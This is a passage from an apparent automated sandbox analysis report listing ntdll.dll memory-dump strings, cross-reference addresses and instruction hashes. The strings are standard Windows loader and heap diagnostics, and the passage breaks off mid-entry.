• @, xrefs: 00F78591
• \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 00F7855E
Memory Dump Source
• Source File: 00000003.00000002.1567650685.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_f10000_file.jbxd
Similarity
• API ID:
• String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
• API String ID: 0-1918872054
• Opcode ID: a64daf1557ed5163904d5f96cc728f15f3727562dd028caa4420d15aa396eb49
• Instruction ID: e162fc613903edb2f025227b4825d6658bdb6a7596497005389b2b654d1b66e3
• Opcode Fuzzy Hash: a64daf1557ed5163904d5f96cc728f15f3727562dd028caa4420d15aa396eb49
• Instruction Fuzzy Hash: BB91BD71548340AFD721EE21CC45FABBBECBF84794F44492EFA8892041E738D945AB63

Strings
• SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 00FB22B6
• SXS: %s() passed the empty activation context, xrefs: 00FB21DE
• .Local, xrefs: 00F728D8
• RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 00FB21D9, 00FB22B1
Memory Dump Source
• Source File: 00000003.00000002.1567650685.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_f10000_file.jbxd
Similarity
• API ID:
• String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
• API String ID: 0-1239276146
• Opcode ID: ed1ecf6015cdba9535cff81c6a8f08aabca43e1882387a57b5fcd56da1f01254
• Instruction ID: eed8a7fd440a778388e68070f0b134abdca37a1af9f89ffa9298c99ab1e922d9
• Opcode Fuzzy Hash: ed1ecf6015cdba9535cff81c6a8f08aabca43e1882387a57b5fcd56da1f01254
• Instruction Fuzzy Hash: E1A1B232D00229DBDB64CF55DC84BE9B3B5BF58324F2441EAD908A7251D7309E81EF92

Strings
• RtlDeactivateActivationContext, xrefs: 00FB3425, 00FB3432, 00FB3451
• SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 00FB3456
• SXS: %s() called with invalid flags 0x%08lx, xrefs: 00FB342A
• SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 00FB3437
Memory Dump Source
• Source File: 00000003.00000002.1567650685.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_f10000_file.jbxd
Similarity
• API ID:
• String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
• API String ID: 0-1245972979
• Opcode ID: 8ec06cbaf3ceefb47b71f8b80b9587223c4171c28552fade45dea1604912b1b9
• Instruction ID: 253f6b8e65fcedda8825eaf6a59f2ccc8b36339b547835f74980c05cd69ad848
• Opcode Fuzzy Hash: 8ec06cbaf3ceefb47b71f8b80b9587223c4171c28552fade45dea1604912b1b9
• Instruction Fuzzy Hash: F1612A32A44B11DFC722CF19C842B66B7E5EF80B60F15852AF8599B281D734FD01EB92

Strings
• ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 00FA10AE
• ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 00FA0FE5
• ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 00FA1028
• ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 00FA106B
Memory Dump Source
• Source File: 00000003.00000002.1567650685.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_f10000_file.jbxd
Similarity
• API ID:
• String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
• API String ID: 0-1468400865
• Opcode ID: c4a87a7ce2b9f86dfe0071a88e479d4216e037a016b19da629d4f8b6738e7bc0
• Instruction ID: 3157dcaa84d1958e8d0417b1ddf4363efb8072917cc06c6c46ad6d9420f1029e
• Opcode Fuzzy Hash: c4a87a7ce2b9f86dfe0071a88e479d4216e037a016b19da629d4f8b6738e7bc0
• Instruction Fuzzy Hash: BF71BEB19043049FCB20EF14C885B9B7FA8AF96764F140468FD498B286D739D589EBD2

Strings
• minkernel\ntdll\ldrinit.c, xrefs: 00FAA9A2
• apphelp.dll, xrefs: 00F62462
• LdrpDynamicShimModule, xrefs: 00FAA998
• Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 00FAA992
Memory Dump Source
• Source File: 00000003.00000002.1567650685.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_f10000_file.jbxd
Similarity
• API ID:
• String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
• API String ID: 0-176724104
• Opcode ID: 47aa9eb3d94f28141bd8e90dba8c96ffc44e26cd6337058ccf73e1cace887619
• Instruction ID: 6ebdbf637fc366511db8274f41abff015b28ca286e3bcec09f889f0e736c38d8
• Opcode Fuzzy Hash: 47aa9eb3d94f28141bd8e90dba8c96ffc44e26cd6337058ccf73e1cace887619
• Instruction Fuzzy Hash: 71315BB2A00201EBDB30DF59DC85A6A77B8FB89724F154019F8416F245C77D9D45E741

Strings
• HEAP[%wZ]: , xrefs: 00F53255
• HEAP: , xrefs: 00F53264
• Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 00F5327D
Memory Dump Source
• Source File: 00000003.00000002.1567650685.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_f10000_file.jbxd
Similarity
• API ID:
• String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
• API String ID: 0-617086771
• Opcode ID: 5efe591b216b2969d8e394107bcdac7a78dd11b8f59181a627a151d877ec8d1f
• Instruction ID: 4455e36199ce4a1247b6a34a6780cc835a12e6d2bd3ccab0c9dedf420879ef35
• Opcode Fuzzy Hash: 5efe591b216b2969d8e394107bcdac7a78dd11b8f59181a627a151d877ec8d1f
• Instruction Fuzzy Hash: B592EE71E042489FDB25CF68C440BADBBF1FF49311F188159E949AB392D738AA49EF50

Strings
Memory Dump Source
• Source File: 00000003.00000002.1567650685.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_f10000_file.jbxd
Similarity
• API ID:
• String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
• API String ID: 0-4253913091
• Opcode ID: 8595608e587ce5e22a10a6eefd587d2deb6822b8b09dbd63fc2b0b1d6553dee5
• Instruction ID: 800173e3050fc6e25cb7b58a0575150f2016bc747bfc322dfac3f5fe61f7cc95
• Opcode Fuzzy Hash: 8595608e587ce5e22a10a6eefd587d2deb6822b8b09dbd63fc2b0b1d6553dee5
• Instruction Fuzzy Hash: 47F1BB71A00A05DFDB25CF68C880B6AB7F5FF45711F248168E9069B382DB34ED85EB90

Strings
Memory Dump Source
• Source File: 00000003.00000002.1567650685.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_f10000_file.jbxd
Similarity
• API ID:
• String ID: $@
• API String ID: 0-1077428164
• Opcode ID: bf4a1f0dbfbdc08c08b240851bc3d16225fb0a556ab4a17977de4feb41752f7d
• Instruction ID: 38d2cfdc7d3ba0c7368d4822b724bc33b3f46a9171943a24cd14cea335d54336
• Opcode Fuzzy Hash: bf4a1f0dbfbdc08c08b240851bc3d16225fb0a556ab4a17977de4feb41752f7d
• Instruction Fuzzy Hash: 40C28072A0C3419FDB25CF24C881BABBBE5AF89754F14892DF989C7241D734D805EB92

Strings
Memory Dump Source
• Source File: 00000003.00000002.1567650685.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_f10000_file.jbxd
Similarity
• API ID:
• String ID: FilterFullPath$UseFilter$\??\
• API String ID: 0-2779062949
• Opcode ID: b180c1637dd56cc2303459c1da5eb2ecdc8e249765dae2bde453e5a4a47ec4e1
• Instruction ID: 7f1c415a28137af3d927f80f4803e2c29cbd0e4f77f09b3f33aa18da686b1ad3
• Opcode Fuzzy Hash: b180c1637dd56cc2303459c1da5eb2ecdc8e249765dae2bde453e5a4a47ec4e1
• Instruction Fuzzy Hash: F6A15A71D016299BDF21DB64CC89BEAB7B8EF48710F1041E9E908A7250D7359E84DF90

Strings
• LdrpCheckModule, xrefs: 00FAA117
• minkernel\ntdll\ldrinit.c, xrefs: 00FAA121
• Failed to allocated memory for shimmed module list, xrefs: 00FAA10F
Memory Dump Source
• Source File: 00000003.00000002.1567650685.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_f10000_file.jbxd
Similarity
• API ID:
• String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
• API String ID: 0-161242083
• Opcode ID: 7ca0f0f13f6c141861a092ab7218681e4ee8ce47330fcafc1c8ba36242c1bb4b
• Instruction ID: 5c075d946e21bb912a752eecae1f1048f026cc6799d8b9568bef6cde6e8e1d5f
• Opcode Fuzzy Hash: 7ca0f0f13f6c141861a092ab7218681e4ee8ce47330fcafc1c8ba36242c1bb4b
• Instruction Fuzzy Hash: FC71D1B1E00205AFCB24DF68CD81AAEB7F4FB44714F244529E8429B251DB39AE45EB51

Strings
Memory Dump Source
• Source File: 00000003.00000002.1567650685.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_f10000_file.jbxd
Similarity
• API ID:
• String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
• API String ID: 0-1334570610
• Opcode ID: 33eb201e655602755f09ff1f5eb04d7527faad4a160ace0ec88078829aa24868
• Instruction ID: 7ea77bb0531c219f5404f834223e058391dc7897640b8d88b9a01147d8a52d04
• Opcode Fuzzy Hash: 33eb201e655602755f09ff1f5eb04d7527faad4a160ace0ec88078829aa24868
• Instruction Fuzzy Hash: EB610571A00701EFDB28CF24C481B6ABBE2FF85715F148559E985CF282DB74E885EB91

Strings
• LdrpInitializePerUserWindowsDirectory, xrefs: 00FB82DE
• minkernel\ntdll\ldrinit.c, xrefs: 00FB82E8
• Failed to reallocate the system dirs string !, xrefs: 00FB82D7
Memory Dump Source
• Source File: 00000003.00000002.1567650685.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_f10000_file.jbxd
Similarity
• API ID:
• String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
• API String ID: 0-1783798831
• Opcode ID: 4c873b3b8e682f4d50f1c8247586a3340da43293dc2cf150c4bd937b9fe6b315
• Instruction ID: 08654d7418c462067a379ec21c51dcfaaa4e462c047ccab07662f73d0620c823
• Opcode Fuzzy Hash: 4c873b3b8e682f4d50f1c8247586a3340da43293dc2cf150c4bd937b9fe6b315
• Instruction Fuzzy Hash: FB410571544300ABC734EB24DC42B5B77ECAF49760F04492EF988D7291EB79D801EB92

Strings
• PreferredUILanguages, xrefs: 00FFC212
                                                                                  • @, xrefs: 00FFC1F1
                                                                                  • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 00FFC1C5
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1567650685.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_f10000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                                                  • API String ID: 0-2968386058
                                                                                  • Opcode ID: c96ffec081b8329b1364381722294e5bd54c0ca6bb53301fb3f7551c708c7644
                                                                                  • Instruction ID: b1be994d75cfe4ca58062476d315d55f5f3af7d815ccca3f3d9f63d3d131865e
                                                                                  • Opcode Fuzzy Hash: c96ffec081b8329b1364381722294e5bd54c0ca6bb53301fb3f7551c708c7644
                                                                                  • Instruction Fuzzy Hash: 17416D72E0022DABDB11DAD4CD91BEEB7B8EF54710F14406AEA05B72A0D7749E44AB90
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1567650685.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_f10000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                                                  • API String ID: 0-1373925480
                                                                                  • Opcode ID: 695b3326841947a0f70dc239aec6c329fd2bc6e51842ecf5e70680783b5a1430
                                                                                  • Instruction ID: df40438abec0425b524ace0e10cde953ade63d2a33d9ca3d34b66fa352b2e641
                                                                                  • Opcode Fuzzy Hash: 695b3326841947a0f70dc239aec6c329fd2bc6e51842ecf5e70680783b5a1430
                                                                                  • Instruction Fuzzy Hash: 22411532D043588BEB22DBE5CC45BADB7B6FF45350F28045AE901EB782D738A945EB10
                                                                                  Strings
                                                                                  • minkernel\ntdll\ldrredirect.c, xrefs: 00FC4899
                                                                                  • LdrpCheckRedirection, xrefs: 00FC488F
                                                                                  • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 00FC4888
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1567650685.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_f10000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                                                  • API String ID: 0-3154609507
                                                                                  • Opcode ID: d880ec8cc2ec5ec53490cd0ddc812a93057b87cad737fb8490dc50354f71f319
                                                                                  • Instruction ID: cbef9851d8f1d76b444bda1d4ee9bb888a2885f860e00eea7b1b05183f1061f7
                                                                                  • Opcode Fuzzy Hash: d880ec8cc2ec5ec53490cd0ddc812a93057b87cad737fb8490dc50354f71f319
                                                                                  • Instruction Fuzzy Hash: 3241B032A042529FCB21CE58DA62F667BE8BF89760F05065DEC98D7291D731FC00EB91
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1567650685.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_f10000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                                                                  • API String ID: 0-2558761708
                                                                                  • Opcode ID: e22f5ac160cb67bee1c8eee990540a54b59397d9eaafe6c78b07a7dc88853f6b
                                                                                  • Instruction ID: 0f40753e2255b726c6c8edbb427fadd550775f6a41329c2a7690888b957ddffb
                                                                                  • Opcode Fuzzy Hash: e22f5ac160cb67bee1c8eee990540a54b59397d9eaafe6c78b07a7dc88853f6b
                                                                                  • Instruction Fuzzy Hash: 2C11E472315941EFD728C614C8A2B79B3A4EF85B26F258119ED06CF251DB34EC84F751
                                                                                  Strings
                                                                                  • Process initialization failed with status 0x%08lx, xrefs: 00FC20F3
                                                                                  • minkernel\ntdll\ldrinit.c, xrefs: 00FC2104
                                                                                  • LdrpInitializationFailure, xrefs: 00FC20FA
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1567650685.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_f10000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                                                  • API String ID: 0-2986994758
                                                                                  • Opcode ID: 93e0d38ad085ddc40d28bda6318c067f0b809617411e05e11babb2021402e09b
                                                                                  • Instruction ID: 2a7923284240c63850e5eb5668e228fd38eaefff4841f2b7f0dcb9b1b5d3addb
                                                                                  • Opcode Fuzzy Hash: 93e0d38ad085ddc40d28bda6318c067f0b809617411e05e11babb2021402e09b
                                                                                  • Instruction Fuzzy Hash: FDF0C231A40319BBD724EA48DD57FD9376CFB41B54F540069F6407B282D6B8E940EA92
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1567650685.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_f10000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: ___swprintf_l
                                                                                  • String ID: #%u
                                                                                  • API String ID: 48624451-232158463
                                                                                  • Opcode ID: 46a44940a2e75414523fa8f7ac7ac679e728cbf544dfb910d60141302d8e54fc
                                                                                  • Instruction ID: 011816e10652248c50b3c1f233102a6fa875551fbc7db04e0983615c366eb588
                                                                                  • Opcode Fuzzy Hash: 46a44940a2e75414523fa8f7ac7ac679e728cbf544dfb910d60141302d8e54fc
                                                                                  • Instruction Fuzzy Hash: 78715DB1A0014A9FCB01DF98C981FAEB7F8EF48754F144065EA05E7251EA78EE05DB60
                                                                                  Strings
                                                                                  • LdrResSearchResource Enter, xrefs: 00F4AA13
                                                                                  • LdrResSearchResource Exit, xrefs: 00F4AA25
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1567650685.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_f10000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
                                                                                  • API String ID: 0-4066393604
                                                                                  • Opcode ID: 2015be9bab5c548c935f71a2c90cc0ab18c74824d3f415c99c660ff822de9b02
                                                                                  • Instruction ID: 1e71dfa7646d3feb79f7a8b6ec773aeaf3c794a0d92a344c4c27deb59bd6636a
                                                                                  • Opcode Fuzzy Hash: 2015be9bab5c548c935f71a2c90cc0ab18c74824d3f415c99c660ff822de9b02
                                                                                  • Instruction Fuzzy Hash: 34E170B2E40218DFEB219E98C980BAEBBB9EF55364F14402AFD01E7251D778DD40EB51
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1567650685.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_f10000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: `$`
                                                                                  • API String ID: 0-197956300
                                                                                  • Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                                                  • Instruction ID: 7ea7008e5ac5e0e598f74a957c0525356a797b2f31d26a8f15954dc7300b1b77
                                                                                  • Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                                                  • Instruction Fuzzy Hash: 0AC18C313043429BE726CE28C841B6ABBE5BFC4314F188A2DF6D68B2D1D775D545CB51
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1567650685.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_f10000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID: Legacy$UEFI
                                                                                  • API String ID: 2994545307-634100481
                                                                                  • Opcode ID: bec924169a6b099303121cb926b55e7359c0252754ee447c83c91a50d9ac91af
                                                                                  • Instruction ID: bd49bfa2cb1141b53843d57a3a748180241291fb1684fffaae904888ff8ce0cc
                                                                                  • Opcode Fuzzy Hash: bec924169a6b099303121cb926b55e7359c0252754ee447c83c91a50d9ac91af
                                                                                  • Instruction Fuzzy Hash: 3F614A72E006189FDB14DFA9C841BEEBBB5FB48700F204169E559EB291DA31E900EF50
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1567650685.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_f10000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: @$MUI
                                                                                  • API String ID: 0-17815947
                                                                                  • Opcode ID: 44b8cbe167561dd9029e74ef923cc8b48a319370207161dfa8fc9f4957c96a3f
                                                                                  • Instruction ID: 2e21c936143f76335e4441df83172551d024f7b79b5ad50ae672f14b054e299b
                                                                                  • Opcode Fuzzy Hash: 44b8cbe167561dd9029e74ef923cc8b48a319370207161dfa8fc9f4957c96a3f
                                                                                  • Instruction Fuzzy Hash: 795145B1E0025DAFDB11DFA5CC81AEEBBB8EB48754F140529E900B7281D634AE05DBA0
                                                                                  Strings
                                                                                  • kLsE, xrefs: 00F40540
                                                                                  • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 00F4063D
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1567650685.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_f10000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                                                  • API String ID: 0-2547482624
                                                                                  • Opcode ID: d3f1c038cd6b8fdc961ee17751e9ef67a235d1656fa977958d8b0c7279398b9c
                                                                                  • Instruction ID: d27c42d1eb6b541f8210f9e3856a185e7b0648f7cc5e1eeb4cfae57d0528103d
                                                                                  • Opcode Fuzzy Hash: d3f1c038cd6b8fdc961ee17751e9ef67a235d1656fa977958d8b0c7279398b9c
                                                                                  • Instruction Fuzzy Hash: 9C51BE729047469FC724EF64C4406A7BBE8EF84714F04883EEADA87241EB74E945DF92
                                                                                  Strings
                                                                                  • RtlpResUltimateFallbackInfo Exit, xrefs: 00F4A309
                                                                                  • RtlpResUltimateFallbackInfo Enter, xrefs: 00F4A2FB
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1567650685.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_f10000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                                                  • API String ID: 0-2876891731
                                                                                  • Opcode ID: 07e20e65593d30f2350731989c40f077464fa941f5a54d3bbd8788cff39a83e2
                                                                                  • Instruction ID: a4999bfb603fd472fd582585132ff859a0e38a367f0ddd4086955fb5e5142e8d
                                                                                  • Opcode Fuzzy Hash: 07e20e65593d30f2350731989c40f077464fa941f5a54d3bbd8788cff39a83e2
                                                                                  • Instruction Fuzzy Hash: 5B419C71A44649DBDB21CF69C840B6ABBB4EF85750F2440A9EC01DB291E376DA40EB51
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1567650685.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_f10000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID: Cleanup Group$Threadpool!
                                                                                  • API String ID: 2994545307-4008356553
                                                                                  • Opcode ID: be89eeebeb9b61bc315b3a642e5e385f36eec5c7d8dba156cff1c0d52a8bf522
                                                                                  • Instruction ID: 4899c2fb53e50cd2b35b395c2770369e427a864c7df05c331f427daa1dd78e55
                                                                                  • Opcode Fuzzy Hash: be89eeebeb9b61bc315b3a642e5e385f36eec5c7d8dba156cff1c0d52a8bf522
                                                                                  • Instruction Fuzzy Hash: DE01ADB2240B00EFD311DF14CD46B1A77E8E784B15F05893AA54CC7190E739EA04EB47
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1567650685.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_f10000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: MUI
                                                                                  • API String ID: 0-1339004836
                                                                                  • Opcode ID: fe3c85b42959d6d252686498863bdf1c1836a65365989f30259e4bcb3b568c2d
                                                                                  • Instruction ID: fb439a69642d221f57d3b1dfc8540d7c9e1a712044e625d0272f57a18e910ffa
                                                                                  • Opcode Fuzzy Hash: fe3c85b42959d6d252686498863bdf1c1836a65365989f30259e4bcb3b568c2d
                                                                                  • Instruction Fuzzy Hash: 6A825C75E012188FDB64CFA9C880BADBBB1FF48720F14816AEC59AB351D7749D41EB90
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1567650685.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_f10000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID: 0-3916222277
                                                                                  • Opcode ID: e50bb092bbaa4174643df7a19a2e6f7c03c32fb3d4031d137befefd0d994f1a3
                                                                                  • Instruction ID: 52c2391da54ee7d4fe697db24310f3d2a71edb8d794e96bedcdcaa07d735570b
                                                                                  • Instruction ID: 1daf388458e835df53bebe555507d8a53fba0901aa553096b9c336a25f9e2eb5
                                                                                  • Opcode Fuzzy Hash: 4eef6443488f6b944ceac6cfc6db31f73b64b658f7c5c1c8891435b9adabcd69
                                                                                  • Instruction Fuzzy Hash: BCA14672E002189FDB21DB98CC48FAEB7B4AF01764F140125E911AB2D1D7789E44EBD1
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1567650685.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_f10000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: ad90bb2a046436a457953d6ac08203a5285e976cedb6bdb9ff3bff75df9a3ac0
                                                                                  • Instruction ID: 064970f150b406813e405ee518f17ea4e11c409f13435a832cfb49683101e2d8
                                                                                  • Opcode Fuzzy Hash: ad90bb2a046436a457953d6ac08203a5285e976cedb6bdb9ff3bff75df9a3ac0
                                                                                  • Instruction Fuzzy Hash: 6EA10F71B006169FDB64EF65C890BEAB7B5FF54324F104029EA05D7281EF78E809EB90
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1567650685.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_f10000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: c5f1663ab216173d0ca477c844f28a1949cc73c434190d1f4a3ed792a9c0d150
                                                                                  • Instruction ID: 2f3722d272a3c53c7217c231e88b94742c9c1096b3a5ca628d5eb6c1085dd7c9
                                                                                  • Opcode Fuzzy Hash: c5f1663ab216173d0ca477c844f28a1949cc73c434190d1f4a3ed792a9c0d150
                                                                                  • Instruction Fuzzy Hash: F8A1DD72A00601AFC712DF18C980B6ABBE9FF48744F050968FA85DB666C339E905CB91
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1567650685.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_f10000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID:
